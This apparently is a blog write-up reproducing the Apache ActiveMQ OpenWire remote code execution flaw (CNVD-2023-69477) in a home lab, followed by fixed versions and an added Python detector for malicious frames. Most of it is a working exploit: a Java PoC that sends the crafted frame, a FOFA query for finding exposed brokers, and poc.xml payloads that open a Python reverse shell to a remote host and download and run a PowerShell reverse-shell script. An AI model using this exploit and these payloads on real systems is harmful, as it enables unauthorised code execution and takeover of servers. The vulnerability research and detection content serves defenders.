Apache ActiveMQ remote code execution (RCE) vulnerability reproduction (CNVD-2023-69477)
This vulnerability was disclosed last week, so it is a good time to reproduce it and write it up.
1. Vulnerability description
A remote code execution vulnerability exists in Apache ActiveMQ. A remote attacker with access to the Apache ActiveMQ server's TCP port (61616 by default) can execute arbitrary code by sending malicious data to the server.
Affected versions:
Apache ActiveMQ < 5.18.3
Apache ActiveMQ < 5.17.6
Apache ActiveMQ < 5.16.7
Apache ActiveMQ < 5.15.16
FOFA syntax:
app="APACHE-ActiveMQ" && port="61616"
2. Environment setup
I reproduced it locally with Kali (attacker) and Windows 10 (target).
Install ActiveMQ
Visit https://activemq.apache.org/ and download any vulnerable version. I downloaded apache-activemq-5.15.10.
Unzip it, enter the bin directory and run:
activemq start  # start the broker
Visit http://127.0.0.1:8161 and you can see that the environment started successfully.
3. Vulnerability reproduction
Download https://github.com/sincere9/Apache-ActiveMQ-RCE/tree/main/exp
After downloading, enter the /exp folder, open ActiveMQ.java and replace the IP addresses with your own (here win10 is 192.168.2.129 and kali is 192.168.2.131):
import java.io.*;
import java.net.Socket;

public class ActiveMQ {
    public static void main(final String[] args) throws Exception {
        System.out.println("[*] Poc for ActiveMQ openwire protocol rce");
        String ip = "192.168.2.129";
        int port = 61616;
        String pocxml = "http://192.168.2.131:8000/poc.xml";
        Socket sck = new Socket(ip, port);
        OutputStream os = sck.getOutputStream();
        DataOutputStream out = new DataOutputStream(os);
        out.writeInt(0);            // frame size, value is irrelevant here
        out.writeByte(31);          // dataType ExceptionResponseMarshaller
        out.writeInt(1);            // CommandId
        out.writeBoolean(true);     // ResponseRequired
        out.writeInt(1);            // CorrelationId
        out.writeBoolean(true);     // exception present
        // true -> a UTF-8 string follows
        out.writeBoolean(true);
        out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext");
        // true -> a UTF-8 string follows
        out.writeBoolean(true);
        out.writeUTF(pocxml);
        // org.apache.activemq.openwire.v1.BaseDataStreamMarshaller#createThrowable is called with these two strings, causing the RCE
        out.close();
        os.close();
        sck.close();
        System.out.println("[*] Target\t" + ip + ":" + port);
        System.out.println("[*] XML address\t" + pocxml);
        System.out.println("[*] Payload send success.");
    }
}
Then modify poc.xml:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>python</value>
                <value>-c</value>
                <value><![CDATA[import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("niubi.com",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>
Then run the commands:
python3 -m http.server 8000  # start the HTTP server serving poc.xml
nc -lvvp 9999                # listen for the reverse shell
javac ActiveMQ.java          # compile
java ActiveMQ                # run
However, although poc.xml was indeed fetched, no reverse shell came back.
So I tried a ping to a DNSlog domain instead.
Modify the xml:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>ping</value>
                <value>t1298j.dnslog.cn</value>
            </list>
        </constructor-arg>
    </bean>
</beans>
Here the DNSlog platform does show a hit, proving that the command was executed.
So I looked for a way to get the reverse shell working. Since the target is Windows, the reverse shell command has to be different, so I used PowerShell instead.
Modify poc.xml again:
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>powershell</value>
                <value>-c</value>
                <value><![CDATA[IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.2.131 -Port 23333]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>
Start the listener and run the exp again.
The reverse shell comes back successfully.
PS: At first the shell did not come back, so I went into \apache-activemq-5.15.10\data, checked activemq.log and found that the connection was being terminated.
So I turned off the Windows 10 firewall, Defender, etc., enabled DEBUG logging with log4j.logger.org.apache.activemq=DEBUG, and used the logs to troubleshoot. Only then did the reverse shell succeed.
4. Fix
The official fix restricts the class deserialized here to subclasses of Throwable, so createThrowable can no longer instantiate an arbitrary class by name. Affected users should upgrade to:
Apache ActiveMQ >= 5.18.3
Apache ActiveMQ >= 5.17.6
Apache ActiveMQ >= 5.16.7
Apache ActiveMQ >= 5.15.16
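The frame comments in the PoC above and the description of the fix both turn on the same point: the broker reads a class name and a string off the wire and instantiates that class with the string as its only constructor argument, and the patch simply refuses anything that is not a Throwable. The following is an added example (not from the post or from the ActiveMQ project) that decodes the exact ExceptionResponse layout the PoC writes and flags class names that cannot be a Throwable, which is what a protocol-aware sensor in front of port 61616 would look for. The suffix heuristic is an assumption: off the wire the class cannot be loaded, so this approximates the server-side isAssignableFrom check; the sample frames are constructed test vectors.

```python
"""Decode the OpenWire ExceptionResponse frame layout used by the PoC above and
flag class names that cannot be a Throwable. Added example, not from the post."""
import struct

EXCEPTION_RESPONSE = 31  # dataType byte the PoC writes (ExceptionResponseMarshaller)

# Heuristic stand-in for the server-side fix (Throwable.class.isAssignableFrom);
# assumption: legitimate Throwable names end with one of these suffixes.
THROWABLE_SUFFIXES = ("Throwable", "Exception", "Error")


def _read_utf(buf: bytes, off: int):
    """Java DataInput.readUTF: 2-byte big-endian length, then the UTF-8 bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    return buf[off:off + n].decode("utf-8"), off + n


def _read_loose_string(buf: bytes, off: int):
    """OpenWire loose string: a presence boolean, then the UTF string if present."""
    present = buf[off]
    off += 1
    if not present:
        return None, off
    return _read_utf(buf, off)


def parse_exception_response(frame: bytes) -> dict:
    """Parse one frame in the layout the PoC writes:
    int size, byte dataType, int commandId, bool responseRequired, int correlationId,
    bool exceptionPresent, looseString className, looseString message."""
    off = 0
    (_size,) = struct.unpack_from(">i", frame, off); off += 4
    dtype = frame[off]; off += 1
    if dtype != EXCEPTION_RESPONSE:
        raise ValueError(f"not an ExceptionResponse frame (dataType={dtype})")
    (command_id,) = struct.unpack_from(">i", frame, off); off += 4
    response_required = bool(frame[off]); off += 1
    (correlation_id,) = struct.unpack_from(">i", frame, off); off += 4
    exception_present = bool(frame[off]); off += 1
    class_name = message = None
    if exception_present:
        class_name, off = _read_loose_string(frame, off)
        message, off = _read_loose_string(frame, off)
    return {
        "command_id": command_id,
        "response_required": response_required,
        "correlation_id": correlation_id,
        "class_name": class_name,
        "message": message,
    }


def is_suspicious(class_name: str) -> bool:
    """True when the class named on the wire does not look like a Throwable.
    The patched broker does the authoritative check inside the JVM; a sensor
    can only apply a naming heuristic like this one."""
    return not class_name.endswith(THROWABLE_SUFFIXES)


def triage(frame: bytes) -> str:
    """Classify one frame for a detection pipeline."""
    info = parse_exception_response(frame)
    if info["class_name"] is None:
        return "ok: no exception payload"
    if is_suspicious(info["class_name"]):
        return (f"ALERT: non-Throwable class {info['class_name']!r} "
                f"with constructor argument {info['message']!r}")
    return f"ok: {info['class_name']}"


def build_frame(class_name: str, message: str) -> bytes:
    """Constructed test vector mirroring the PoC's DataOutputStream calls."""
    def utf(s: str) -> bytes:
        b = s.encode("utf-8")
        return struct.pack(">H", len(b)) + b
    return (struct.pack(">i", 0) + bytes([EXCEPTION_RESPONSE])
            + struct.pack(">i", 1) + b"\x01" + struct.pack(">i", 1)
            + b"\x01" + b"\x01" + utf(class_name) + b"\x01" + utf(message))


# Constructed samples: a normal exception response, and the class/URL pair the PoC sends.
BENIGN = build_frame("java.lang.SecurityException", "access denied")
MALICIOUS = build_frame("org.springframework.context.support.ClassPathXmlApplicationContext",
                        "http://192.168.2.131:8000/poc.xml")

if __name__ == "__main__":
    for f in (BENIGN, MALICIOUS):
        print(triage(f))
```

The second frame is flagged because a Spring application context is not a Throwable, and its "message" is the remote XML URL that the class's String constructor will load; that is exactly the case the 5.15.16/5.16.7/5.17.6/5.18.3 fix closes. The heuristic will not catch every abuse (and the broker's tight wire format encodes the same fields differently), so patching remains the real fix and this is supporting detection only.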